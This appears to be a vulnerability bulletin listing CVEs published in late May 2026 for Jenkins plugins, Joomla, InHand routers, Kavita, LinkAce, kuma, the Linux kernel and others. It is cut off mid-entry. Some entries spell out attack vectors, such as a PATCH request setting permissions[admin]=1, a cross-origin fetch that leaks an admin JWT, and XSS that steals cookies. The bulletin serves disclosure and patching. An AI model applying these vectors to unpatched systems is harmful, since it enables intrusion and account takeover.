| Google--MCP Toolbox for Databases | MCP Toolbox for Databases is vulnerable to DNS rebinding attacks when using SSE (http://b/499408790). During the beta phase the `allowed-origins` and `allowed-hosts` flags were implemented to align with MCP security guidelines, but the hardcoded `Access-Control-Allow-Origin: *` header in the SSE initialization handler was inadvertently retained, so the allowlists were never enforced on that path. This vulnerability specifically impacts users connecting to Toolbox via SSE under specification version 2024-11-05. | 2026-05-27 | not yet calculated | CVE-2026-9739 | https://github.com/googleapis/mcp-toolbox/issues/3053 https://github.com/googleapis/mcp-toolbox/pull/3054 |
| GOVCERT-LU--eml_parser | eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.1, EmlParser.get_raw_body_text() recurses unconditionally for every nested message/rfc822 attachment without any depth limit. An attacker who can supply a badly crafted EML file with approximately 120 nested message/rfc822 parts triggers an unhandled RecursionError and aborts parsing of the message. A 12 KB EML file is enough to crash a worker. Though this causes the parser to crash, it is an unlikely scenario as the suggested EML that crashes the parser would not pass basic RFC compliance tests. This vulnerability is fixed in 3.0.1. | 2026-05-26 | not yet calculated | CVE-2026-44844 | https://github.com/GOVCERT-LU/eml_parser/security/advisories/GHSA-g47v-rwmh-r9f8 |
| GPAC--MP4Box | A NULL pointer dereference in GPAC MP4Box: when parsing certain truncated MP4 files, an unknown/invalid stsd entry can result in missing descriptor fields (e.g., codec/mime/profile strings). gf_media_map_esd then calls strlen() on a NULL pointer, triggering a crash (ASan SEGV). | 2026-05-27 | not yet calculated | CVE-2025-70116 | https://github.com/gpac/gpac/issues/3345 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/68/68_gf_media_map_esd_media_tools_isom_tools_c_1364 https://infosec.exchange/@sigdevel/116624563750949972 |
| grokability--snipe-it | Snipe-IT is an IT asset/license management system. Prior to 8.4.1, an authenticated user with only the users.edit permission can escalate their own privileges to admin by sending a PATCH request to /api/v1/users/{id} with permissions[admin]=1. The API controller only strips the superuser key from the permissions array, allowing admin and all other permission keys to be set by any user who can update users. This vulnerability is fixed in 8.4.1. | 2026-05-26 | not yet calculated | CVE-2026-44832 | https://github.com/grokability/snipe-it/security/advisories/GHSA-hq28-crg7-95pr https://github.com/grokability/snipe-it/commit/ce18ff669ceb0f0349749fd5d11c1d3d40b10569 |
| Hitachi Energy--MACH HiDraw | A heap-based buffer overflow vulnerability exists in the XML parser functionality of HiDraw. An authenticated malicious user with local access can exploit it with a specially crafted XML file, which may lead to memory corruption and potentially arbitrary code execution. Successful exploitation could result in application crashes (denial of service) and compromise the confidentiality and integrity of the affected system. | 2026-05-26 | not yet calculated | CVE-2026-7310 | https://publisher.hitachienergy.com/preview?DocumentID=8DBD000248&LanguageCode=en&DocumentPartId=&Action=Launch |
| Hitachi Energy--RTU500 series CMU firmware | The IEC 60870-5-104 implementation in RTU500, when used in bidirectional mode, is vulnerable to a NULL pointer dereference if a specially crafted sequence of messages is sent over a certain period of time, causing a denial of service. The product is only affected if IEC 60870-5-104 functionality in bidirectional mode (BCI) is configured. | 2026-05-26 | not yet calculated | CVE-2026-8479 | https://publisher.hitachienergy.com/preview?DocumentID=8DBD000252&LanguageCode=en&DocumentPartId=&Action=Launch |
| IBM--Aspera HSTS for CP4I | IBM Aspera HSTS for CP4I 1.5.1 through 1.5.19 | 2026-05-27 | not yet calculated | CVE-2026-7876 | https://www.ibm.com/support/pages/node/7274127 |
| IBM--Business Automation Workflow containers and traditional | IBM Business Automation Workflow containers and traditional may leak information about its database structure in error messages. | 2026-05-27 | not yet calculated | CVE-2026-1248 | https://www.ibm.com/support/pages/node/7271445 |
| IBM--HTTP Server | IBM HTTP Server 8.5, and 9.0 | 2026-05-26 | not yet calculated | CVE-2026-9170 | https://www.ibm.com/support/pages/node/7274065 |
| IBM--OPENBMC | IBM OPENBMC FW1110.00 through FW1110.11 is vulnerable to denial of service attacks by unauthenticated network users. | 2026-05-27 | not yet calculated | CVE-2026-7254 | https://www.ibm.com/support/pages/node/7272993 |
| inducer--relate | RELATE is a web-based courseware package. Prior to commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb, RELATE LMS configures its Celery workers to accept and deserialize untrusted 'pickle' data. An attacker who can reach the message broker can execute arbitrary commands on the host server. Combined with missing network isolation in the code execution sandbox, this allows an authenticated student to achieve full Remote Code Execution (RCE) on the host system. Commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb fixes the issue. | 2026-05-27 | not yet calculated | CVE-2026-47161 | https://github.com/inducer/relate/security/advisories/GHSA-4mwh-mwv4-m252 https://github.com/inducer/relate/commit/d66ba5659b459bf1ba56b7109b5f9ecf197cbefb |
| InHand Networks--IPSec VPN | A command injection vulnerability exists in the IPSec VPN feature of InHand Networks IR302 firmware V3.5.108, IR305 firmware V1.0.118, IR315 firmware V1.0.118, IR615 firmware V1.0.118, and earlier versions. Attackers can exploit this vulnerability to obtain ROOT privileges on remote target devices. | 2026-05-28 | not yet calculated | CVE-2026-38707 | https://www.inhand.com/wp-content/uploads/InHand-PSA-2026-05_EN.pdf |
| InHand Networks--WireGuard VPN | A command injection vulnerability exists in the WireGuard VPN feature of InHand Networks IR302 firmware V3.5.108, IR305 firmware V1.0.118, IR315 firmware V1.0.118, IR615 firmware V1.0.118, and earlier versions. Attackers can exploit this vulnerability to obtain ROOT privileges on remote target devices. | 2026-05-28 | not yet calculated | CVE-2026-38704 | https://www.inhand.com/wp-content/uploads/InHand-PSA-2026-05_EN.pdf |
| InHands Networks--Admin Access Feature | A command injection vulnerability exists in the Admin Access feature of InHand Networks IR302 firmware V3.5.108, IR305 firmware V1.0.118, IR315 firmware V1.0.118, IR615 firmware V1.0.118, and earlier versions. Attackers can exploit this vulnerability to obtain ROOT privileges on remote target devices. | 2026-05-28 | not yet calculated | CVE-2026-38702 | https://www.inhand.com/wp-content/uploads/InHand-PSA-2026-05_EN.pdf |
| InHands Networks--ZeroTier VPN | A command injection vulnerability exists in the ZeroTier VPN feature of InHand Networks IR302 firmware V3.5.108, IR305 firmware V1.0.118, IR315 firmware V1.0.118, IR615 firmware V1.0.118, and earlier versions. Attackers can exploit this vulnerability to obtain ROOT privileges on remote target devices. | 2026-05-28 | not yet calculated | CVE-2026-38703 | https://www.inhand.com/wp-content/uploads/InHand-PSA-2026-05_EN.pdf |
| Intermesh--groupoffice | Group-Office is an enterprise customer relationship management and groupware tool. Prior to 26.0.25, 25.0.100, and 6.8.165, GroupOffice allows authenticated users to persist arbitrary legacy settings for any user_id via index.php?r=core/saveSetting. A separate client-side sink in the email module injects the email_font_size setting directly into JavaScript without escaping. By combining these two issues, any low-privileged authenticated user can overwrite an administrator's email_font_size setting with a JavaScript payload and trigger stored XSS in the administrator's browser when the GroupOffice web client loads views/Extjs3/modulescripts.php. This vulnerability is fixed in 26.0.25, 25.0.100, and 6.8.165. | 2026-05-29 | not yet calculated | CVE-2026-45551 | https://github.com/Intermesh/groupoffice/security/advisories/GHSA-9w92-p32g-g99p |
| iskorotkov--avro | iskorotkov/avro is a fast Go Avro codec. Prior to 2.33.0, several Avro decoder paths read attacker-controlled 64-bit values from the wire format and either narrowed them to platform-sized int before bounds-checking, or summed them with overflow-prone signed-int arithmetic. On 32-bit targets (GOARCH=386, arm, mips, wasm, etc.), the truncation paths can silently bypass byte-slice limits, select the wrong union branch, or hit the OCF negative-make panic via wrap. Three sub-issues are not 32-bit-specific: cumulative-size arithmetic overflow in arrayDecoder.Decode / mapDecoder.Decode / mapDecoderUnmarshaler.Decode (wraps at math.MaxInt64 on amd64 / arm64 and bypasses MaxSliceAllocSize / MaxMapAllocSize), math.MinInt negation in block-header handling, and make([]byte, size) with a negative size in OCF block reads - all three panic or bypass caps on any platform, giving an attacker a denial-of-service primitive there. This vulnerability is fixed in 2.33.0. | 2026-05-29 | not yet calculated | CVE-2026-46384 | https://github.com/iskorotkov/avro/security/advisories/GHSA-mc57-h6j3-3hmv |
| iskorotkov--avro | iskorotkov/avro is a fast Go Avro codec. Prior to 2.33.0, the Avro array and map decoders looped over an attacker-controlled block-count value without checking the underlying reader's error state inside the loop body. Reader.ReadBlockHeader returns the count as a Go int, which is 64-bit on amd64 / arm64 targets - so a producer can declare a block of up to math.MaxInt64 (~9.2 × 10¹⁸) elements followed by EOF (or any truncated payload), and the decoder will attempt that many no-op iterations before propagating the error. The realistic ceiling is "indefinite until the worker is killed externally" - a single hostile payload pins a CPU core until the process is OOM-killed, deadline-cancelled, or terminated. Remote, unauthenticated denial-of-service. This vulnerability is fixed in 2.33.0. | 2026-05-29 | not yet calculated | CVE-2026-46385 | https://github.com/iskorotkov/avro/security/advisories/GHSA-w8j3-pq8g-8m7w |
| Jason-2605 Admin Panel 4.0--Jason-2605 Admin Panel 4.0 | A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the delete.php endpoint of Jason2605 AdminPanel 4.0. | 2026-05-27 | not yet calculated | CVE-2026-30498 | https://github.com/Mehdi-Ben-Hamou/CVE-2026-30498 |
| Jenkins Project--Jenkins Active Directory Plugin | Jenkins Active Directory Plugin 2.41 and earlier follows LDAP referrals by default. | 2026-05-27 | not yet calculated | CVE-2026-48918 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Active Directory Plugin | Jenkins Active Directory Plugin 2.41 and earlier deserializes data from LDAP referrals without validation. | 2026-05-27 | not yet calculated | CVE-2026-48919 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins AppSpider Plugin | Jenkins AppSpider Plugin 1.0.17 and earlier does not perform a permission check in a method implementing form validation, allowing attackers with Overall/Read permission to connect to an attacker-specified URL. | 2026-05-27 | not yet calculated | CVE-2026-48923 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Bitbucket OAuth Plugin | Jenkins Bitbucket OAuth Plugin 0.17 and earlier does not restrict the redirect URL after login, allowing attackers to perform phishing attacks. | 2026-05-27 | not yet calculated | CVE-2026-48924 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins buildgraph-view Plugin | Jenkins buildgraph-view Plugin 1.8 and earlier does not escape the build URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs or views. | 2026-05-27 | not yet calculated | CVE-2026-48927 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Credentials Binding Plugin | Jenkins Credentials Binding Plugin 720.v3f6decef43ea_ and earlier does not properly sanitize file names for file and zip file credentials, allowing attackers able to provide credentials to a job to write files to arbitrary locations on the node filesystem, which can lead to remote code execution if Jenkins is configured to allow a low-privileged user to configure file or zip file credentials used for a job running on the built-in node. | 2026-05-27 | not yet calculated | CVE-2026-48922 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Email Extension Plugin | Jenkins Email Extension Plugin 1933.v45cec755423f and earlier allows inlining images as `base64` in email content by setting the `data-inline` attribute, without restrictions on the image URLs that can be inlined, allowing attackers able to control the email content to specify `file:` URLs for images to read arbitrary files from the Jenkins controller filesystem. | 2026-05-27 | not yet calculated | CVE-2026-48920 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins GitHub Integration Plugin | A cross-site request forgery (CSRF) vulnerability in Jenkins GitHub Integration Plugin 0.7.3 and earlier allows attackers to trigger a build for a pull request. | 2026-05-27 | not yet calculated | CVE-2026-48925 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Job Import Plugin | Jenkins Job Import Plugin 143.v044a_2e819b_27 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. | 2026-05-27 | not yet calculated | CVE-2026-48926 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins LDAP Plugin | Jenkins LDAP Plugin 807.v7d7de30930cf and earlier follows LDAP referrals. | 2026-05-27 | not yet calculated | CVE-2026-48916 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins LDAP Plugin | Jenkins LDAP Plugin 807.v7d7de30930cf and earlier deserializes data from LDAP referrals without validation. | 2026-05-27 | not yet calculated | CVE-2026-48917 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Multijob Plugin | A cross-site request forgery (CSRF) vulnerability in Jenkins Multijob Plugin 662.vd2e0001f6b_b_d and earlier allows attackers to resume failed Multijob builds. | 2026-05-27 | not yet calculated | CVE-2026-9674 | Jenkins Security Advisory 2026-05-27 |
| Jenkins Project--Jenkins Pipeline: Groovy Libraries Plugin | Jenkins Pipeline: Groovy Libraries Plugin 797.v90ea_a_9b_e45a_0 and earlier does not prohibit symbolic links in shared libraries, allowing attackers able to control the content of a library used by a Pipeline job to read arbitrary files on the Jenkins controller filesystem. | 2026-05-27 | not yet calculated | CVE-2026-48921 | Jenkins Security Advisory 2026-05-27 |
| jg-rp--liquid | Python Liquid is a Python engine for the Liquid template language. Prior to 2.2.0, the built-in FileSystemLoader and CachingFileSystemLoader do not guard against reading files outside their search paths when given an absolute path to resolve. This allows malicious template authors to load and render arbitrary files via the {% include %} and {% render %} tags. Targeted files would need to contain valid Liquid markup and be readable by the application process. This vulnerability is fixed in 2.2.0. | 2026-05-28 | not yet calculated | CVE-2026-45017 | https://github.com/jg-rp/liquid/security/advisories/GHSA-8p4x-wr7x-3788 |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to an XSS vector in the feed modules. | 2026-05-26 | not yet calculated | CVE-2026-25900 | https://developer.joomla.org/security-centre/1033-20260501-core-xss-in-feed-modules.html |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to an XSS vector in the multilingual associations component. | 2026-05-26 | not yet calculated | CVE-2026-25901 | https://developer.joomla.org/security-centre/1034-20260502-core-xss-in-com-associations.html |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to an XSS vector in the content history component. | 2026-05-26 | not yet calculated | CVE-2026-30894 | https://developer.joomla.org/security-centre/1035-20260503-core-xss-in-com-contenthistory |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to an XSS vector in the readmore links for com_content. | 2026-05-26 | not yet calculated | CVE-2026-30895 | https://developer.joomla.org/security-centre/1036-20260504-core-xss-in-readmore-links |
| Joomla! Project--Joomla! CMS | Lack of CSRF token validation leads to a CSRF attack vector in the admin activation endpoint of com_users. | 2026-05-26 | not yet calculated | CVE-2026-35220 | https://developer.joomla.org/security-centre/1037-20260505-core-csrf-in-user-activation-endpoint |
| Joomla! Project--Joomla! CMS | Improperly built filter clauses lead to a SQL injection vulnerability in the search query for com_finder. | 2026-05-26 | not yet calculated | CVE-2026-35221 | https://developer.joomla.org/security-centre/1038-20260506-core-authenticated-blind-sqli-in-com-finder.html |
| Joomla! Project--Joomla! CMS | Improperly validated order clauses lead to a SQL injection vulnerability in com_tags. | 2026-05-26 | not yet calculated | CVE-2026-35222 | https://developer.joomla.org/security-centre/1039-20260507-core-authenticated-blind-sqli-in-com-tags.html |
| Joomla! Project--Joomla! CMS | An improper access check allows unauthorized access to com_config webservice endpoints. | 2026-05-26 | not yet calculated | CVE-2026-35223 | https://developer.joomla.org/security-centre/1040-20260508-core-improper-access-check-in-com-config-webservice-endpoints.html |
| Joomla! Project--Joomla! CMS | An improper validation of user-supplied input leads to a local file inclusion vulnerability. | 2026-05-26 | not yet calculated | CVE-2026-40383 | https://developer.joomla.org/security-centre/1041-20260509-core-lfi-in-htmlview-layout-parameter.html |
| Joomla! Project--Joomla! CMS | An improper validation of the search parameter of the com_media files API endpoint leads to a path traversal vulnerability. | 2026-05-26 | not yet calculated | CVE-2026-40384 | https://developer.joomla.org/security-centre/1042-20260510-core-path-traversal-in-com-media-webservice-endpoint.html |
| Joomla! Project--Joomla! CMS | Insufficient state checks lead to a vector that allows 2FA checks to be bypassed. | 2026-05-26 | not yet calculated | CVE-2026-48896 | https://developer.joomla.org/security-centre/1043-20260511-core-mfa-authentication-bypass.html |
| Joomla! Project--Joomla! CMS | Insufficient state checks lead to a vector that allows 2FA checks to be bypassed. | 2026-05-26 | not yet calculated | CVE-2026-48897 | https://developer.joomla.org/security-centre/1044-20260512-core-mfa-authentication-bypass.html |
| Joomla! Project--Joomla! CMS | An improper access check allows privilege escalation through the com_users batch task. | 2026-05-26 | not yet calculated | CVE-2026-48898 | https://developer.joomla.org/security-centre/1045-20260513-core-privilege-escalation-through-com-users-batch-task.html |
| Joomla! Project--Joomla! CMS | An improper access check allows privilege escalation through the com_users batch task. | 2026-05-26 | not yet calculated | CVE-2026-48899 | https://developer.joomla.org/security-centre/1047-20260515-core-incorrect-access-control-in-sample-data-plugins.html |
| Joomla! Project--Joomla! CMS | An improper access check allowed low privileged users to edit the task types of existing scheduler tasks. | 2026-05-26 | not yet calculated | CVE-2026-48900 | https://developer.joomla.org/security-centre/1048-20260516-core-incorrect-access-control-in-com-scheduler.html |
| Joomla! Project--Joomla! CMS | The InputFilter::getInstance() method omitted a security sensitive parameter from the instance cache key. | 2026-05-26 | not yet calculated | CVE-2026-48901 | https://developer.joomla.org/security-centre/1049-20260517-core-incorrect-cache-key-construction-for-inputfilter-objects.html |
| Joomla! Project--Joomla! CMS | The password and username reset features created plain http links for https connections if the "Force SSL" flag wasn't explicitly set. | 2026-05-26 | not yet calculated | CVE-2026-48902 | https://developer.joomla.org/security-centre/1050-20260518-core-transport-encryption-downgrade-for-password-and-username-reset-links.html |
| Joomla! Project--Joomla! CMS | An improper access check allows privilege escalation through the com_users group editing webservice endpoint. | 2026-05-26 | not yet calculated | CVE-2026-48904 | https://developer.joomla.org/security-centre/1046-20260514-core-privilege-escalation-through-com-users-webservice-endpoints.html |
| Joomla! Project--Joomla! Framework Filter package | Inadequate content filtering within the checkAttribute methods leads to XSS vulnerabilities in various components. | 2026-05-26 | not yet calculated | CVE-2026-48903 | https://developer.joomla.org/security-centre/1051-20260519-framework-inadequate-content-filtering-within-the-checkattribute-filter-code.html |
| Joomla! Project--Joomla! Framework Filter package | Lack of input filtering leads to an XSS vector in the HTML filter code. | 2026-05-26 | not yet calculated | CVE-2026-48905 | https://developer.joomla.org/security-centre/1052-20260520-framework-inadequate-content-filtering-within-the-cleanattributes-filter-code.html |
| Kareadita--Kavita | Kavita is a cross platform reading server. Prior to 0.9.0, the ReaderController.GetImage endpoint is decorated with [AllowAnonymous], allowing completely unauthenticated access to page images from any chapter in any library. While the endpoint accepts an apiKey parameter, it is never validated. Since entity IDs are sequential integers, an unauthenticated attacker can trivially enumerate all content on the server. This vulnerability is fixed in 0.9.0. | 2026-05-26 | not yet calculated | CVE-2026-44775 | https://github.com/Kareadita/Kavita/security/advisories/GHSA-6gc9-6r8p-5wg2 https://github.com/Kareadita/Kavita/blob/8c686df2dbc2d0a83120e8b3f8c1269107bb815d/API/Controllers/ReaderController.cs#L116 |
| Kareadita--Kavita | Kavita is a cross platform reading server. Prior to 0.9.0, the download, size-check, and chapter metadata endpoints do not enforce library-level authorization. A low-privileged user who knows or guesses a chapterId, volumeId, or seriesId belonging to a library they are not assigned to can download the full file contents, query file sizes, and read metadata for that content. This affects /api/Download/volume-size, /api/Download/chapter-size, /api/Download/series-size, /api/Download/volume, /api/Download/chapter, /api/Download/series, and /api/Chapter. This vulnerability is fixed in 0.9.0. | 2026-05-26 | not yet calculated | CVE-2026-44776 | https://github.com/Kareadita/Kavita/security/advisories/GHSA-x3jq-95xw-gwvr |
| Kareadita--Kavita | Kavita is a cross platform reading server. Prior to 0.9.0.2, an Improper Token validation flaw permits a remote and unauthenticated threat actor to request a JWT for any user including admins given knowledge of their username. This vulnerability is fixed in 0.9.0.2. | 2026-05-26 | not yet calculated | CVE-2026-47202 | https://github.com/Kareadita/Kavita/security/advisories/GHSA-m2v3-fcjh-hm22 https://github.com/Kareadita/Kavita/releases/tag/v0.9.0.2 |
| Kenik--KG-5230TAS-IL-3 | Kenik Camera management Panel is vulnerable to Path Traversal vulnerability. An unauthenticated attacker can send GET request with arbitrary file path and read corresponding files located on the server. The issue was fixed in version 2026-04-23 of the KG-5260xxxx-IL-(G)2 cameras. Rest of the products were fixed in version 2025-04-21. | 2026-05-25 | not yet calculated | CVE-2026-7766 | https://cert.pl/posts/2026/05/CVE-2026-7766 |
| Kovah--LinkAce | LinkAce is a self-hosted archive to collect website links. Prior to 2.5.6, LinkAce contains an Insecure Direct Object Reference vulnerability in the authorization policy layer that allows any authenticated user to modify resources owned by other users. The affected resource types are links, lists, tags, and notes. Both the web UI and the REST API are vulnerable. The root cause is in the update() methods of all four model policies: LinkPolicy, LinkListPolicy, TagPolicy, and NotePolicy. Each delegates to an access-check method (e.g., userCanAccessLink()) that returns true for any resource with non-private visibility, regardless of who owns it. This means any registered user can edit any public or internal resource across the entire instance. The delete() methods in the same policy files correctly require ownership via $link->user->is($user), which confirms that update was intended to be owner-only. The same flaw exists in the API layer through AuthorizesUserApiActions::userCanUpdateModel(), which mirrors the broken visibility-only check instead of the ownership check used by userCanDeleteModel(). Bulk edit operations via BulkEditController are also affected. This vulnerability is fixed in 2.5.6. | 2026-05-28 | not yet calculated | CVE-2026-45342 | https://github.com/Kovah/LinkAce/security/advisories/GHSA-cj8f-h888-m57m |
| Kovah--LinkAce | LinkAce is a self-hosted archive to collect website links. Prior to 2.5.6, LinkAce contains a stored cross-site scripting vulnerability that allows a low-privilege user to execute arbitrary JavaScript in an administrator's browser session. This affects instances configured with SSO/OAuth authentication, which is one of the supported authentication methods in LinkAce. An attacker who sets their OAuth display name to a malicious script and then creates an API token will plant a persistent XSS payload in the audit log. When any admin navigates to /system/audit, the payload executes in the admin's browser context. This enables session cookie theft, CSRF token exfiltration (exposed in the la-app-data meta tag), or any other action the admin can perform. This vulnerability is fixed in 2.5.6. | 2026-05-28 | not yet calculated | CVE-2026-45343 | https://github.com/Kovah/LinkAce/security/advisories/GHSA-jx4g-ph82-x9mm |
| Krajowa Izba Rozliczeniowa--Szafir SDK | Szafir SDK returns a success status code from the cryptographic digital signature verification process (i.e. /VerifyingTaskItem/Signature/VerificationResult/Result/@code == 0, "Positively verified") even when the trust status of the signer's certificate could not be established (i.e. /VerifyingTaskItem/Signature/VerificationResult/SigningCertificate/@certificateType == "nondetermined"). This causes consuming applications to incorrectly treat the signature as valid despite an unverified certificate chain, enabling authentication bypass and user impersonation. This issue was fixed in version 463. | 2026-05-25 | not yet calculated | CVE-2026-9058 | https://cert.pl/posts/2026/05/CVE-2026-9058 https://www.elektronicznypodpis.pl/ |
| kumahq--kuma | Kuma is a modern Envoy-based service mesh that can run on every cloud across both Kubernetes and VMs. Prior to 2.7.25, 2.9.15, 2.11.13, 2.12.10, and 2.13.5, the default kuma-cp config leaks the admin bootstrap token and signing keys to any webpage the operator visits while the control plane is reachable from their browser. CorsAllowedDomains: [".*"] reflects any Origin, and LocalhostIsAdmin: true promotes requests from 127.0.0.1 to mesh-system:admin. A cross-origin fetch() from a malicious page returns the admin JWT and signing material. This vulnerability is fixed in 2.7.25, 2.9.15, 2.11.13, 2.12.10, and 2.13.5. | 2026-05-28 | not yet calculated | CVE-2026-45021 | https://github.com/kumahq/kuma/security/advisories/GHSA-3vcp-chfh-f6r2 https://github.com/kumahq/kuma/pull/16416 https://github.com/kumahq/kuma/pull/16423 https://github.com/kumahq/kuma/pull/16424 https://github.com/kumahq/kuma/pull/16425 https://github.com/kumahq/kuma/pull/16426 https://github.com/kumahq/kuma/pull/16427 https://github.com/kumahq/kuma/commit/8fefa8595d44eb68d922405702ed7a0826322907 |
| kvf-admin--kvf-admin | Insecure Permissions vulnerability in kvf-admin v1.0.0 allows a remote attacker to escalate privileges via the UserController.java component | 2026-05-27 | not yet calculated | CVE-2026-38807 | https://github.com/cagexunxi/CVE/issues/1 |
| leiweibau--Pi.Alert | Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. From 2024-06-29 to before 2026-05-07, the web application endpoint is vulnerable to SQL injection. The /pialert/php/server/devices.php route accepts requests from unauthenticated users when the action URL parameter is set to getDevicesTotals. The scansource URL parameter is then injected in a SQL query. This vulnerability is fixed in 2026-05-07. | 2026-05-27 | not yet calculated | CVE-2026-44886 | https://github.com/leiweibau/Pi.Alert/security/advisories/GHSA-m929-j7w8-334j |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. In 3.2.0 and earlier, in src/mistune/directives/image.py, the render_figure() function concatenates figclass and figwidth options directly into HTML attributes without escaping. This allows attribute injection and XSS even when HTMLRenderer(escape=True) is used, because these values bypass the inline renderer. | 2026-05-26 | not yet calculated | CVE-2026-44896 | https://github.com/lepture/mistune/security/advisories/GHSA-58cw-g322-p94v |
| libjxl--libjxl | Heap buffer overflow vulnerability in libjxl 0.12.0 via crafted PBM images to the jxl::extras::DecodeImagePNM function in file lib/extras/dec/pnm.cc. | 2026-05-27 | not yet calculated | CVE-2025-70103 | https://github.com/libjxl/libjxl/issues/4337 https://github.com/libjxl/libjxl/pull/4338 https://github.com/sigdevel/pocs/blob/main/res/libjxl/2025/2 https://infosec.exchange/@sigdevel/116642233929409910 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix race condition when checking rpm_on When autosuspend is triggered, driver rpm_on flag is set to indicate that a suspend/resume is already in progress. However, when a userspace application submits a command during this narrow window, amdxdna_pm_resume_get() may incorrectly skip the resume operation because the rpm_on flag is still set. This results in commands being submitted while the device has not actually resumed, causing unexpected behavior. The set_dpm() is called by suspend/resume, it relied on rpm_on flag to avoid calling into rpm suspend/resume recursively. So to fix this, remove the use of the rpm_on flag entirely. Instead, introduce aie2_pm_set_dpm() which explicitly resumes the device before invoking set_dpm(). With this change, set_dpm() is called directly inside the suspend or resume execution path. Otherwise, aie2_pm_set_dpm() is called. | 2026-05-27 | not yet calculated | CVE-2025-71303 | https://git.kernel.org/stable/c/e7cb75b6a5127d78298e39750b4f3185eca0dafc https://git.kernel.org/stable/c/00ffe45ece80160aef446d74ded906352f21dd72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smack: /smack/doi: accept previously used values Writing to /smack/doi a value that has ever been written there in the past disables networking for non-ambient labels. E.g. # cat /smack/doi 3 # netlabelctl -p cipso list Configured CIPSO mappings (1) DOI value : 3 mapping type : PASS_THROUGH # netlabelctl -p map list Configured NetLabel domain mappings (3) domain: "_" (IPv4) protocol: UNLABELED domain: DEFAULT (IPv4) protocol: CIPSO, DOI = 3 domain: DEFAULT (IPv6) protocol: UNLABELED # cat /smack/ambient _ # cat /proc/$$/attr/smack/current _ # ping -c1 10.1.95.12 64 bytes from 10.1.95.12: icmp_seq=1 ttl=64 time=0.964 ms # echo foo >/proc/$$/attr/smack/current # ping -c1 10.1.95.12 64 bytes from 10.1.95.12: icmp_seq=1 ttl=64 time=0.956 ms unknown option 86 # echo 4 >/smack/doi # echo 3 >/smack/doi !> [ 214.050395] smk_cipso_doi:691 cipso add rc = -17 # echo 3 >/smack/doi !> [ 249.402261] smk_cipso_doi:678 remove rc = -2 !> [ 249.402261] smk_cipso_doi:691 cipso add rc = -17 # ping -c1 10.1.95.12 !!> ping: 10.1.95.12: Address family for hostname not supported # echo _ >/proc/$$/attr/smack/current # ping -c1 10.1.95.12 64 bytes from 10.1.95.12: icmp_seq=1 ttl=64 time=0.617 ms This happens because Smack keeps decommissioned DOIs, fails to re-add them, and consequently refuses to add the "default" domain map: # netlabelctl -p cipso list Configured CIPSO mappings (2) DOI value : 3 mapping type : PASS_THROUGH DOI value : 4 mapping type : PASS_THROUGH # netlabelctl -p map list Configured NetLabel domain mappings (2) domain: "_" (IPv4) protocol: UNLABELED !> (no ipv4 map for default domain here) domain: DEFAULT (IPv6) protocol: UNLABELED Fix by clearing decommissioned DOI definitions and serializing concurrent DOI updates with a new lock. Also: - allow /smack/doi to live unconfigured, since adding a map (netlbl_cfg_cipsov4_map_add) may fail. CIPSO_V4_DOI_UNKNOWN(0) indicates the unconfigured DOI - add new DOI before removing the old default map, so the old map remains if the add fails (2008-02-04, Casey Schaufler) | 2026-05-27 | not yet calculated | CVE-2025-71304 | https://git.kernel.org/stable/c/eb718a3c8181ada679340db34cd61bce48e44749 https://git.kernel.org/stable/c/6ec091c5c7eeabd249a7c46813cad1e9f555f859 https://git.kernel.org/stable/c/199452f22d2f74b897fe826f81ec402b0a8461a0 https://git.kernel.org/stable/c/1c7ee23dfcd18d80770d8f90f2ab5bb1b2bfd8a3 https://git.kernel.org/stable/c/f8071500177f38cff38892bd85ac631cc6e010b2 https://git.kernel.org/stable/c/5a247a84de0ba44edbbd6be851c8a6b2aa60ff85 https://git.kernel.org/stable/c/8beebb8ad9a003f978e53b06237986588223e15e https://git.kernel.org/stable/c/33d589ed60ae433b483761987b85e0d24e54584e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/display/dp_mst: Add protection against 0 vcpi When releasing a timeslot there is a slight chance we may end up with the wrong payload mask due to overflow if the delayed_destroy_work ends up coming into play after a DP 2.1 monitor gets disconnected which causes vcpi to become 0 then we try to make the payload = ~BIT(vcpi - 1) which is a negative shift. VCPI id should never really be 0 hence skip changing the payload mask if VCPI is 0. Otherwise it leads to <7> [515.287237] xe 0000:03:00.0: [drm:drm_dp_mst_get_port_malloc [drm_display_helper]] port ffff888126ce9000 (3) <4> [515.287267] -----------[ cut here ]----------- <3> [515.287268] UBSAN: shift-out-of-bounds in ../drivers/gpu/drm/display/drm_dp_mst_topology.c:4575:36 <3> [515.287271] shift exponent -1 is negative <4> [515.287275] CPU: 7 UID: 0 PID: 3108 Comm: kworker/u64:33 Tainted: G S U 6.17.0-rc6-lgci-xe-xe-3795-3e79699fa1b216e92+ #1 PREEMPT(voluntary) <4> [515.287279] Tainted: [S]=CPU_OUT_OF_SPEC, [U]=USER <4> [515.287279] Hardware name: ASUS System Product Name/PRIME Z790-P WIFI, BIOS 1645 03/15/2024 <4> [515.287281] Workqueue: 